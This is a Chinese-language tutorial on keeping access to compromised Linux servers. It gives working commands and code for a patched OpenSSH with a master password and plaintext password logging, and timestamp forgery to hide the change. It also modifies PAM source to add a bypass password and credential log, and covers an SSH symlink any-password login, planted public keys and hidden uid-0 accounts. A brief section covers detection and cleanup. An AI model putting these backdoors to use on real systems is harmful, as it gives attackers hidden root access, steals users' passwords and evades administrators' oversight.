【权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录

权限维持-Linux-替换版本-OpenSSH后门

这里复现也真是奇怪，在靶机上没复现成功，在服务器上复现成功了
原理：替换本身操作系统的ssh协议支撑软件openssh，重新安装自定义的openssh,达到记录帐号密码，也可以采用万能密码连接的功能！
参考：(演示未做版本修改及文件修改时间处理)

1、环境准备：

yum -y install openssl openssl-devel pam-devel zlib zlib-devel
yum -y install gcc gcc-c++ make                                   
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar -xzvf openssh-5.9p1.tar.gz 
tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cd openssh-5.9p1 && patch < sshbd5.9p1.diff

2、编辑密码：

vim includes.h
177 #define ILOG "/tmp/ilog"#ILOG是别人用ssh登录该主机记录的日志目录
178 #define OLOG "/tmp/olog"#OLOG是该主机用ssh登录其他主机记录的日志目录 
179 #define SECRETPW "whgojp"#万能密码
180 #endif /* INCLUDES_H */

3、安装编译：

./configure --prefix=/usr  --sysconfdir=/etc/ssh  --with-pam  --with-kerberos5  && make && make install
service sshd restart   #重启sshd服务
systemctl status sshd.service #查看ssh启动状态

修改sshd程序和配置文件的时间，避免被管理员发现sshd程序发生了修改

touch -r ssh_config.bank ssh_config
touch -r sshd_config.bank sshd_config
touch -r /usr/sbin/sshd.bank /usr/sbin/sshd

以及修改后的ssh版本

使用万能密码登录成功，并且未留下登录记录，同时在/tmp/ilog 记录了别人用ssh登录该主机记录的日志目录(明文密码)

还真是明文密码，溜了赶紧恢复快照

@拓展玩法：

1、可以采用万能密码登录
2、实现监控服务器登录登出的账号密码（发到外网）

OpenSSH后门的防范方法

重装OpenSSH软件，更新至最新版本7.2。
将SSH默认登录端口22更改为其他端口。
在IPTable中添加SSH访问策略。
查看命令历史记录，对可疑文件进行清理。在有条件的情况下，可重做系统。
修改服务器所有用户的密码为新的强健密码。
使用strace命令找出SSH后门。运行“ps aux | grep sshd”命令获取可疑进程的PID，运行“strace -o aa -ff -p PID”命令进行跟踪，成功登录SSH后，在当前目录下就生成了strace命令的输出。使用“grep open aa* | grep -v -e No -e null -e denied| grep WR”命令查看记录文件。在上面的命令中，过滤错误信息、/dev/null信息和拒绝（denied）信息，找出打开了读写模式（WR）的文件（因为要把记录的密码写入文件）。可以找到以读写方式记录在文件中的SSH后门密码文件的位置，并通过该方法判断是否存在SSH后门。当然，也有不记录密码，而仅仅留下一个万能SSH后门的情况。

权限维持-Linux-更改验证-SSH-PAM后门

参考：https://xz.aliyun.com/t/7902
PAM是一种认证模块，PAM可以作为Linux登录验证和各类基础服务的认证，简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务，然后加载相应的PAM的配置文件(位于/etc/pam.d)，最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持
1、获取目标系统所使用的PAM版本，下载对应版本的pam版本
2、解压缩，修改pam_unix_auth.c文件，添加万能密码
3、编译安装PAM
4、编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中进行替换，即使用万能密码登陆，将用户名密码记录到文件中。

配置环境

关闭

selinux setenforce 0

查询版本

rpm -qa | grep pam
wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz
tar -zxvf Linux-PAM-1.1.8
yum install gcc flex flex-devel -y

-修改配置：
留PAM后门和保存SSH登录的账号密码
修改 Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("hackers",p)==0){return PAM_SUCCESS;}    //后门密码
    if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);} 
name = p = NULL;

AUTH_RETURN;
-编译安装：

./configure && make

-备份复制：
备份原有pam_unix.so,防止出现错误登录不上
复制新PAM模块到/lib64/security/目录下

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp
cd modules/pam_unix/.libs
cp pam_unix.so /usr/lib64/security/pam_unix.so

权限维持-Linux-登录方式-软链接&公私钥&新帐号

SSH软链接

在sshd服务配置启用PAM认证的前提下，PAM配置文件中控制标志为sufficient时，只要pam_rootok模块检测uid为0（root）即可成功认证登录。
SSH配置中开启了PAM进行身份验证
查看是否使用PAM进行身份验证：

cat /etc/ssh/sshd_config|grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=4567

ssh [email protected] -p 4567 任意密码登录即可

缺点：重启后失效 重新开了一个端口，容易被发现

公私钥

https://www.bilibili.com/read/cv17721345/
开启：
vim /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
ssh-keygen -t rsa #三次回车

id_rsa : 私钥
id_rsa.pub : 公钥

直接登陆，无需密码

缺点：容易被发现

后门帐号

###添加root用户：
#添加账号test1，设置uid为0，密码为123456

useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1

echo "xiaodi:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号
passwd xiaodi #修改xiaodi的密码为xiaodi123

参考

https://www.cnblogs.com/csnd/p/11807653.html
https://mp.weixin.qq.com/s/BNrJHUs9qxEVHNSFEghaRw